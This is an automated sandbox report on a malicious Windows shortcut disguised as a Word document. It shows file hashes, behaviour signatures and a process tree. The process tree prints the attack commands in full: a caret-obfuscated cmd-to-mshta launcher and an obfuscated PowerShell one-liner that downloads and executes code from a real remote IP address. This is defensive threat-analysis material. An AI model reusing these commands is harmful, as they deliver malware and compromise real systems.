Overview

overview

8

Static

static

N-388-30.0...cx.lnk

windows7_x64

8

N-388-30.0...cx.lnk

windows10_x64

8

Analysis

  • max time kernel
    113s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    16/07/2020, 18:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    N-388-30.06.2020.docx.lnk

  • Size

    60KB

  • MD5

    7b5f028144aa35afdf9f4835fa5432b8

  • SHA1

    8bf59baf6a003c279e95540bfb92149f6f0ba668

  • SHA256

    35bc847e8a2ac7ccb75850cf69db5a47c245ed2a4dc5e98283dfd8f7f9df59e1

  • SHA512

    2dd8bf9ab657252f86de10126f4533a3fd0053f8adb6abb2e62d30aebd9fb257d036442f3383bde2ff9fac410f2613a4caccb57fd0ff04dc8c22d164a4ed9ead

Score
8/10
persistence

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 12 IoCs
  • Deletes itself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Blacklisted process makes network request 5 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\N-388-30.06.2020.docx.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c set m=m^s^h^ta && set a=N-388-^30.06.^2020.^docx.l^nk && if exist "!cd!\!a!" (!m! "!cd!\!a!") else (!m! "!temp!\Temp1_За^прос.z^ip\!a!")
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\system32\mshta.exe
        mshta "C:\Users\Admin\AppData\Local\Temp\N-388-30.06.2020.docx.lnk "
        3⤵
        • Suspicious use of WriteProcessMemory
        • Deletes itself
        • Modifies Internet Explorer settings
        PID:1312
        • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\N-388-30.06.2020.docx"
          4⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of SetWindowsHookEx
          PID:908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c while(!(.("""{0}{1}{2}"""-f ("""{1}{0}""" -f 'st-','Te'),("""{2}{1}{0}""" -f 'ec','onn','C'),("""{1}{0}"""-f'n','tio')) ("""{1}{2}{0}""" -f ("""{0}{1}"""-f("""{1}{0}"""-f'.c','le'),'om'),'g','oog') -q)) {&("""{1}{2}{0}{3}""" -f ("""{0}{1}""" -f("""{0}{1}""" -f 'a','rt-'),'Sl'),'S','t','eep') -s 5} .("""{1}{0}""" -f'ex','i')(.("""{2}{1}{0}""" -f't',("""{1}{0}"""-f 'jec','Ob'),("""{0}{1}""" -f'Ne','w-')) ("""{0}{4}{1}{2}{3}"""-f ("""{1}{0}""" -f 'W',("""{0}{1}"""-f 'Net','.')),'C','li','ent','eb')).("""{3}{4}{1}{2}{0}"""-f'ing',("""{1}{0}"""-f'lo','wn'),("""{1}{0}""" -f 'Str','ad'),'D','o')."""In`Vo`kE"""(("""http://45.61.138.170/decide.php"""))
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Blacklisted process makes network request
          PID:776

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1312-4-0x0000000005EB0000-0x0000000005ED3000-memory.dmp

    Filesize

    140KB

    Download